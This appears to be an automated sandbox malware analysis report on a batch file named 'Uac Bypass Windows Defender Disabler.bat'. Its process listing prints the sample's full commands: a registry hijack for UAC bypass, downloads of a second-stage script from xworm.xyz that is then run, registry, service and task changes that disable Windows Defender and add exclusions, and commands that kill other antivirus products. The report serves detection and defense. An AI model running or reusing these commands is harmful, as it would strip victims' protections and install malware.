Malware Analysis Report

2024-10-16 05:00

Sample ID 240729-z2nz7a1apm
Target Uac Bypass Windows Defender Disabler.bat
SHA256 acdf188d1f3e0d039a2e1b375566acdf640196cbb42ead21be755f9c438e041e
Tags
dropper evasion execution trojan
score
10/10

Table of Contents

Analysis Overview

MITRE ATT&CK

Enterprise Matrix V15

Analysis: static1

Detonation Overview

Signatures

Analysis: behavioral1

Detonation Overview

Command Line

Signatures

Processes

Network

Files

Analysis: behavioral2

Detonation Overview

Command Line

Signatures

Processes

Network

Files

Analysis Overview

score
10/10

SHA256

acdf188d1f3e0d039a2e1b375566acdf640196cbb42ead21be755f9c438e041e

Threat Level: Known bad

The file Uac Bypass Windows Defender Disabler.bat was found to be: Known bad.

Malicious Activity Summary

dropper evasion execution trojan

Disables service(s)

Modifies Windows Defender Real-time Protection settings

Windows security bypass

Blocklisted process makes network request

Command and Scripting Interpreter: PowerShell

Stops running service(s)

Command and Scripting Interpreter: PowerShell

Download via BitsAdmin

Launches sc.exe

Runs net.exe

Suspicious behavior: EnumeratesProcesses

Kills process with taskkill

Modifies registry key

Suspicious use of WriteProcessMemory

Uses Task Scheduler COM API

Suspicious use of AdjustPrivilegeToken

Modifies registry class

MITRE ATT&CK

Analysis: static1

Detonation Overview

Reported

2024-07-29 21:12

Signatures

N/A

Analysis: behavioral1

Detonation Overview

Submitted

2024-07-29 21:12

Reported

2024-07-29 21:15

Platform

win10-20240404-en

Max time kernel

133s

Max time network

138s

Command Line

C:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\Uac Bypass Windows Defender Disabler.bat"

Signatures

Disables service(s)

evasion execution

Modifies Windows Defender Real-time Protection settings

evasion trojan
Description Indicator Process Target
Set value (int) \REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableScanOnRealtimeEnable = "1" C:\Windows\system32\reg.exe N/A
Key created \REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection C:\Windows\system32\reg.exe N/A
Key created \REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection C:\Windows\system32\reg.exe N/A
Set value (int) \REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableScanOnRealtimeEnable = "1" C:\Windows\system32\reg.exe N/A
Key created \REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection C:\Windows\system32\reg.exe N/A
Set value (int) \REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableBehaviorMonitoring = "1" C:\Windows\system32\reg.exe N/A
Key created \REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection C:\Windows\system32\reg.exe N/A
Set value (int) \REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableBehaviorMonitoring = "1" C:\Windows\system32\reg.exe N/A
Set value (int) \REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableOnAccessProtection = "1" C:\Windows\system32\reg.exe N/A
Key created \REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection C:\Windows\system32\reg.exe N/A
Set value (int) \REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableOnAccessProtection = "1" C:\Windows\system32\reg.exe N/A
Key created \REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection C:\Windows\system32\reg.exe N/A

Windows security bypass

evasion trojan
Description Indicator Process Target
Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths C:\Windows\system32\reg.exe N/A
Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths C:\Windows\system32\reg.exe N/A
Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths C:\Windows\system32\reg.exe N/A
Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths C:\Windows\system32\reg.exe N/A

Blocklisted process makes network request

Description Indicator Process Target
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A

Command and Scripting Interpreter: PowerShell

execution
Description Indicator Process Target
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A

Download via BitsAdmin

dropper
Description Indicator Process Target
N/A N/A C:\Windows\system32\bitsadmin.exe N/A

Stops running service(s)

evasion execution

Modifies registry class

Description Indicator Process Target
Set value (str) \REGISTRY\USER\S-1-5-21-1687926120-3022217735-1146543763-1000_Classes\mscfile\shell\open\command\ = "cmd.exe /c reg delete HKCU\\Software\\Classes\\mscfile\\shell\\open\\command /f & C:\\Windows\\System32\\cmd.exe" C:\Windows\system32\reg.exe N/A
Key created \REGISTRY\USER\S-1-5-21-1687926120-3022217735-1146543763-1000_Classes\mscfile\shell\open\command C:\Windows\system32\reg.exe N/A
Key created \REGISTRY\USER\S-1-5-21-1687926120-3022217735-1146543763-1000_Classes\mscfile C:\Windows\system32\reg.exe N/A
Key created \REGISTRY\USER\S-1-5-21-1687926120-3022217735-1146543763-1000_Classes\mscfile\shell C:\Windows\system32\reg.exe N/A
Key created \REGISTRY\USER\S-1-5-21-1687926120-3022217735-1146543763-1000_Classes\mscfile\shell\open C:\Windows\system32\reg.exe N/A

Modifies registry key

Description Indicator Process Target
N/A N/A C:\Windows\system32\reg.exe N/A

Runs net.exe

Suspicious use of AdjustPrivilegeToken

Description Indicator Process Target
Token: SeDebugPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\system32\taskkill.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\system32\taskkill.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\system32\taskkill.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\system32\taskkill.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\system32\taskkill.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\system32\taskkill.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\system32\taskkill.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\system32\taskkill.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\system32\taskkill.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\system32\taskkill.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\system32\taskkill.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\system32\taskkill.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\system32\taskkill.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\system32\taskkill.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\system32\taskkill.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\system32\taskkill.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\system32\taskkill.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\system32\taskkill.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\system32\taskkill.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\system32\taskkill.exe N/A

Suspicious use of WriteProcessMemory

Description Indicator Process Target
PID 1284 wrote to memory of 1112 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\net.exe
PID 1284 wrote to memory of 1112 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\net.exe
PID 1112 wrote to memory of 1884 N/A C:\Windows\system32\net.exe C:\Windows\system32\net1.exe
PID 1112 wrote to memory of 1884 N/A C:\Windows\system32\net.exe C:\Windows\system32\net1.exe
PID 1284 wrote to memory of 4148 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\reg.exe
PID 1284 wrote to memory of 4148 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\reg.exe
PID 1284 wrote to memory of 800 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\bitsadmin.exe
PID 1284 wrote to memory of 800 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\bitsadmin.exe
PID 1284 wrote to memory of 4004 N/A C:\Windows\system32\cmd.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 1284 wrote to memory of 4004 N/A C:\Windows\system32\cmd.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 1284 wrote to memory of 1476 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\cmd.exe
PID 1284 wrote to memory of 1476 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\cmd.exe
PID 1476 wrote to memory of 2876 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\sc.exe
PID 1476 wrote to memory of 2876 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\sc.exe
PID 1476 wrote to memory of 64 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\sc.exe
PID 1476 wrote to memory of 64 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\sc.exe
PID 1476 wrote to memory of 2060 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\schtasks.exe
PID 1476 wrote to memory of 2060 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\schtasks.exe
PID 1476 wrote to memory of 2496 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\schtasks.exe
PID 1476 wrote to memory of 2496 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\schtasks.exe
PID 1476 wrote to memory of 2212 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\schtasks.exe
PID 1476 wrote to memory of 2212 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\schtasks.exe
PID 1476 wrote to memory of 4176 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\reg.exe
PID 1476 wrote to memory of 4176 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\reg.exe
PID 1476 wrote to memory of 5004 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\reg.exe
PID 1476 wrote to memory of 5004 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\reg.exe
PID 1476 wrote to memory of 4572 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\reg.exe
PID 1476 wrote to memory of 4572 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\reg.exe
PID 1476 wrote to memory of 2880 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\reg.exe
PID 1476 wrote to memory of 2880 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\reg.exe
PID 1476 wrote to memory of 3984 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\reg.exe
PID 1476 wrote to memory of 3984 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\reg.exe
PID 1476 wrote to memory of 1460 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\reg.exe
PID 1476 wrote to memory of 1460 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\reg.exe
PID 1476 wrote to memory of 1380 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\reg.exe
PID 1476 wrote to memory of 1380 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\reg.exe
PID 1476 wrote to memory of 3336 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\reg.exe
PID 1476 wrote to memory of 3336 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\reg.exe
PID 1476 wrote to memory of 4196 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\reg.exe
PID 1476 wrote to memory of 4196 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\reg.exe
PID 1476 wrote to memory of 364 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\reg.exe
PID 1476 wrote to memory of 364 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\reg.exe
PID 1476 wrote to memory of 2540 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\reg.exe
PID 1476 wrote to memory of 2540 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\reg.exe
PID 1476 wrote to memory of 1564 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\reg.exe
PID 1476 wrote to memory of 1564 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\reg.exe
PID 1476 wrote to memory of 1008 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\schtasks.exe
PID 1476 wrote to memory of 1008 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\schtasks.exe
PID 1476 wrote to memory of 2096 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\reg.exe
PID 1476 wrote to memory of 2096 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\reg.exe
PID 1476 wrote to memory of 4464 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\reg.exe
PID 1476 wrote to memory of 4464 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\reg.exe
PID 1476 wrote to memory of 4984 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\reg.exe
PID 1476 wrote to memory of 4984 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\reg.exe
PID 1476 wrote to memory of 5080 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\reg.exe
PID 1476 wrote to memory of 5080 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\reg.exe
PID 1476 wrote to memory of 2360 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\reg.exe
PID 1476 wrote to memory of 2360 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\reg.exe
PID 1476 wrote to memory of 3036 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\reg.exe
PID 1476 wrote to memory of 3036 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\reg.exe
PID 1476 wrote to memory of 772 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\reg.exe
PID 1476 wrote to memory of 772 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\reg.exe
PID 1476 wrote to memory of 1804 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\reg.exe
PID 1476 wrote to memory of 1804 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\reg.exe

Uses Task Scheduler COM API

persistence

Processes

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\Uac Bypass Windows Defender Disabler.bat"

C:\Windows\system32\net.exe

net session

C:\Windows\system32\net1.exe

C:\Windows\system32\net1 session

C:\Windows\system32\reg.exe

reg add HKCU\Software\Classes\mscfile\shell\open\command /ve /d "cmd.exe /c reg delete HKCU\Software\Classes\mscfile\shell\open\command /f & C:\Windows\System32\cmd.exe" /f

C:\Windows\system32\bitsadmin.exe

bitsadmin /transfer mydownloadjob /download /priority normal https://xworm.xyz/stuff/$sxr-defender.bat C:\Users\Admin\AppData\Local\Temp\$sxr-defender.bat

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell -Command "Invoke-WebRequest -Uri 'https://xworm.xyz/stuff/$sxr-defender.bat' -OutFile 'C:\Users\Admin\AppData\Local\Temp\$sxr-defender.bat'"

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /K "C:\Users\Admin\AppData\Local\Temp\$sxr-defender.bat"

C:\Windows\system32\sc.exe

sc stop WinDefend

C:\Windows\system32\sc.exe

sc config WinDefend start= disabled

C:\Windows\system32\schtasks.exe

schtasks /Change /TN "Microsoft\Windows\Windows Defender\Windows Defender Scheduled Scan" /Disable

C:\Windows\system32\schtasks.exe

schtasks /Change /TN "Microsoft\Windows\Windows Defender\Windows Defender Cache Maintenance" /Disable

C:\Windows\system32\schtasks.exe

schtasks /Change /TN "Microsoft\Windows\Windows Defender\Windows Defender Cleanup" /Disable

C:\Windows\system32\reg.exe

reg add "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows Defender\Features" /v "TamperProtection" /t REG_DWORD /d "0" /f

C:\Windows\system32\reg.exe

reg add "HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender" /v "DisableAntiSpyware" /t REG_DWORD /d "1" /f

C:\Windows\system32\reg.exe

reg add "HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender" /v "DisableAntiVirus" /t REG_DWORD /d "1" /f

C:\Windows\system32\reg.exe

reg add "HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection" /v "DisableBehaviorMonitoring" /t REG_DWORD /d "1" /f

C:\Windows\system32\reg.exe

reg add "HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection" /v "DisableOnAccessProtection" /t REG_DWORD /d "1" /f

C:\Windows\system32\reg.exe

reg add "HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection" /v "DisableScanOnRealtimeEnable" /t REG_DWORD /d "1" /f

C:\Windows\system32\reg.exe

reg add "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows Defender\Features" /v "TamperProtection" /t REG_DWORD /d "0" /f

C:\Windows\system32\reg.exe

reg add "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /v "C:\Users\Public" /t REG_SZ /d "" /f

C:\Windows\system32\reg.exe

reg add "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /v "C:\Users\Admin\AppData\Roaming" /t REG_SZ /d "" /f

C:\Windows\system32\reg.exe

reg add "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /v "C:\Users\Admin\AppData\Local\Temp" /t REG_SZ /d "" /f

C:\Windows\system32\reg.exe

reg add "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /v "C:\Users\Admin" /t REG_SZ /d "" /f

C:\Windows\system32\reg.exe

reg add "HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Scan" /v "DisableScheduledScan" /t REG_DWORD /d "1" /f

C:\Windows\system32\schtasks.exe

schtasks /Change /TN "Microsoft\Windows\Windows Defender\Windows Defender Verification" /Disable

C:\Windows\system32\reg.exe

reg add "HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender" /v "DisableAntiSpyware" /t REG_DWORD /d "1" /f

C:\Windows\system32\reg.exe

reg add "HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender" /v "DisableRoutinelyTakingAction" /t REG_DWORD /d "1" /f

C:\Windows\system32\reg.exe

reg add "HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender" /v "DisableAntiVirus" /t REG_DWORD /d "1" /f

C:\Windows\system32\reg.exe

reg add "HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection" /v "DisableBehaviorMonitoring" /t REG_DWORD /d "1" /f

C:\Windows\system32\reg.exe

reg add "HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection" /v "DisableOnAccessProtection" /t REG_DWORD /d "1" /f

C:\Windows\system32\reg.exe

reg add "HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection" /v "DisableScanOnRealtimeEnable" /t REG_DWORD /d "1" /f

C:\Windows\system32\reg.exe

reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender" /v "DisableAntiSpyware" /t REG_DWORD /d 1 /f

C:\Windows\system32\reg.exe

reg add "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\AppHost" /v "EnableWebContentEvaluation" /t REG_DWORD /d "0" /f

C:\Windows\system32\reg.exe

reg add "HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\AppHost" /v "EnableWebContentEvaluation" /t REG_DWORD /d "0" /f

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell -Command "Set-MpPreference -DisableTamperProtection $true"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell -Command "New-ItemProperty -Path 'HKLM:\SOFTWARE\Microsoft\Windows Defender\Features' -Name 'TamperProtection' -Value 0 -PropertyType DWORD -Force"

C:\Windows\system32\sc.exe

sc stop mfevtp

C:\Windows\system32\sc.exe

sc config mfevtp start= disabled

C:\Windows\system32\sc.exe

sc stop mfefire

C:\Windows\system32\sc.exe

sc config mfefire start= disabled

C:\Windows\system32\sc.exe

sc stop mfehidk

C:\Windows\system32\sc.exe

sc config mfehidk start= disabled

C:\Windows\system32\sc.exe

sc stop mfeapfk

C:\Windows\system32\sc.exe

sc config mfeapfk start= disabled

C:\Windows\system32\sc.exe

sc stop mfeavfk

C:\Windows\system32\sc.exe

sc config mfeavfk start= disabled

C:\Windows\system32\sc.exe

sc stop mfefirek

C:\Windows\system32\sc.exe

sc config mfefirek start= disabled

C:\Windows\system32\sc.exe

sc stop avastsvc

C:\Windows\system32\sc.exe

sc config avastsvc start= disabled

C:\Windows\system32\sc.exe

sc stop avastui

C:\Windows\system32\sc.exe

sc config avastui start= disabled

C:\Windows\system32\sc.exe

sc stop nissrv

C:\Windows\system32\sc.exe

sc config nissrv start= disabled

C:\Windows\system32\sc.exe

sc stop Symantec AntiVirus

C:\Windows\system32\sc.exe

sc config "Symantec AntiVirus" start= disabled

C:\Windows\system32\sc.exe

sc stop ccSvcHst

C:\Windows\system32\sc.exe

sc config ccSvcHst start= disabled

C:\Windows\system32\sc.exe

sc stop NortonSecurity

C:\Windows\system32\sc.exe

sc config NortonSecurity start= disabled

C:\Windows\system32\sc.exe

sc stop Norton AntiVirus

C:\Windows\system32\sc.exe

sc config "Norton AntiVirus" start= disabled

C:\Windows\system32\taskkill.exe

taskkill /F /IM Mcafee

C:\Windows\system32\taskkill.exe

taskkill /F /IM mcafee

C:\Windows\system32\taskkill.exe

taskkill /F /IM Mcafee.exe

C:\Windows\system32\taskkill.exe

taskkill /F /IM mcafee.exe

C:\Windows\system32\taskkill.exe

taskkill /F /IM McUICnt.exe

C:\Windows\system32\taskkill.exe

taskkill /F /IM McPltCmd.exe

C:\Windows\system32\taskkill.exe

taskkill /F /IM mcuihost.exe

C:\Windows\system32\taskkill.exe

taskkill /F /IM McInstru.exe

C:\Windows\system32\taskkill.exe

taskkill /F /IM avastui.exe

C:\Windows\system32\taskkill.exe

taskkill /F /IM ccSvcHst.exe

C:\Windows\system32\taskkill.exe

taskkill /F /IM mfefirek.exe

C:\Windows\system32\taskkill.exe

taskkill /F /IM mfehidk.exe

C:\Windows\system32\taskkill.exe

taskkill /F /IM avastsvc.exe

C:\Windows\system32\taskkill.exe

taskkill /F /IM McUICnt.exe

C:\Windows\system32\taskkill.exe

taskkill /F /IM McPltCmd.exe

C:\Windows\system32\taskkill.exe

taskkill /F /IM ModuleCoreService.exe

C:\Windows\system32\taskkill.exe

taskkill /F /IM ZhuDongFangYu.exe

C:\Windows\system32\taskkill.exe

taskkill /F /IM 360Safe.exe

C:\Windows\system32\taskkill.exe

taskkill /F /IM 360Tray.exe

C:\Windows\system32\taskkill.exe

taskkill /F /IM ns.exe

Network

Country Destination Domain Proto
US 8.8.8.8:53 xworm.xyz udp
US 198.54.114.193:443 xworm.xyz tcp
US 8.8.8.8:53 193.114.54.198.in-addr.arpa udp
US 198.54.114.193:443 xworm.xyz tcp
US 8.8.8.8:53 30.243.111.52.in-addr.arpa udp
US 8.8.8.8:53 91.65.42.20.in-addr.arpa udp

Files

memory/4004-4-0x00007FFC29E13000-0x00007FFC29E14000-memory.dmp

memory/4004-5-0x0000016B271C0000-0x0000016B271E2000-memory.dmp

memory/4004-7-0x00007FFC29E10000-0x00007FFC2A7FC000-memory.dmp

memory/4004-9-0x00007FFC29E10000-0x00007FFC2A7FC000-memory.dmp

memory/4004-10-0x0000016B27370000-0x0000016B273E6000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_hvsc3lbd.kxi.ps1

MD5 c4ca4238a0b923820dcc509a6f75849b
SHA1 356a192b7913b04c54574d18c28d46e6395428ab
SHA256 6b86b273ff34fce19d6b804eff5a3f5747ada4eaa22f1d49c01e52ddb7875b4b
SHA512 4dff4ea340f0a823f15d3f4f01ab62eae0e5da579ccb851f8db9dfe84c58b2b37b89903a740e1ee172da793a6e79d560e5f7f9bd058a12a280433ed6fa46510a

memory/4004-25-0x00007FFC29E10000-0x00007FFC2A7FC000-memory.dmp

memory/4004-31-0x00007FFC29E10000-0x00007FFC2A7FC000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\$sxr-defender.bat

MD5 03bf8860dbd0724e466baf1e1bca86b3
SHA1 bde4d3ef9ac846e1e83bea37f88097cd370d5197
SHA256 968dc5ab087e7a593d9b2682c2f6ee8aa6fd756ae874328a12d892d2b68fd0af
SHA512 0f3f5492be21a3af8262363f3d593aa63080f2d2db574451d8b94d4f00c3c3f06cb17c5795e6cccef84e9ebe684062a51829139177f7539f6629373e56e2e92f

C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\powershell.exe.log

MD5 42d4b1d78e6e092af15c7aef34e5cf45
SHA1 6cf9d0e674430680f67260194d3185667a2bb77b
SHA256 c4089b4313f7b8b74956faa2c4e15b9ffb1d9e5e29ac7e00a20c48b8f7aef5e0
SHA512 d31f065208766eea61facc91b23babb4c94906fb564dc06d114cbbc4068516f94032c764c188bed492509010c5dbe61f096d3e986e0ae3e70a170a9986458930

C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

MD5 8a15e30f9c44a503e3666936a851b0f7
SHA1 65edb50e8fd7cd7077749165c8544b08ae094e5e
SHA256 1ff7c93f3aba06119b7b8663dc8fd00780d965cdde5afae68ea6603601771441
SHA512 539a2043e27f058c81370a5d1b35f2c18af866c6416751c0d77aa3439392c8b254096055da83b1719ae066d8ded6a8c7d974a5fe5cd7873d664a6613de3907ec

C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

MD5 c6ab1c560795981f7ae9739268cfe22e
SHA1 289d5ae79442bba5353821f7bdbb4075f52b8013
SHA256 cfe7887979a8fbb050bc46de23567bd2b757784a389faa4cee691e5ba8ea9a20
SHA512 717ee3dad2daa8ec4fa9d55d25c377637858194af3562b291e9672a767edd7b7faecb9a54e27eef9ed5b2a7072e873718daa538c33e761f565a5c5c7e84da988

Analysis: behavioral2

Detonation Overview

Submitted

2024-07-29 21:12

Reported

2024-07-29 21:15

Platform

win11-20240709-en

Max time kernel

147s

Max time network

153s

Command Line

C:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\Uac Bypass Windows Defender Disabler.bat"

Signatures

Disables service(s)

evasion execution

Modifies Windows Defender Real-time Protection settings

evasion trojan
Description Indicator Process Target
Set value (int) \REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableBehaviorMonitoring = "1" C:\Windows\system32\reg.exe N/A
Set value (int) \REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableOnAccessProtection = "1" C:\Windows\system32\reg.exe N/A
Key created \REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection C:\Windows\system32\reg.exe N/A
Key created \REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection C:\Windows\system32\reg.exe N/A
Key created \REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection C:\Windows\system32\reg.exe N/A
Key created \REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection C:\Windows\system32\reg.exe N/A
Key created \REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection C:\Windows\system32\reg.exe N/A
Set value (int) \REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableScanOnRealtimeEnable = "1" C:\Windows\system32\reg.exe N/A
Set value (int) \REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableBehaviorMonitoring = "1" C:\Windows\system32\reg.exe N/A
Set value (int) \REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableOnAccessProtection = "1" C:\Windows\system32\reg.exe N/A
Key created \REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection C:\Windows\system32\reg.exe N/A
Set value (int) \REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableScanOnRealtimeEnable = "1" C:\Windows\system32\reg.exe N/A

Windows security bypass

evasion trojan
Description Indicator Process Target
Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths\C:\Users\Admin\AppData\Roaming C:\Windows\system32\reg.exe N/A
Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths C:\Windows\system32\reg.exe N/A
Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths\C:\Users\Admin\AppData\Local\Temp C:\Windows\system32\reg.exe N/A
Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths C:\Windows\system32\reg.exe N/A
Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths\C:\Users\Admin C:\Windows\system32\reg.exe N/A
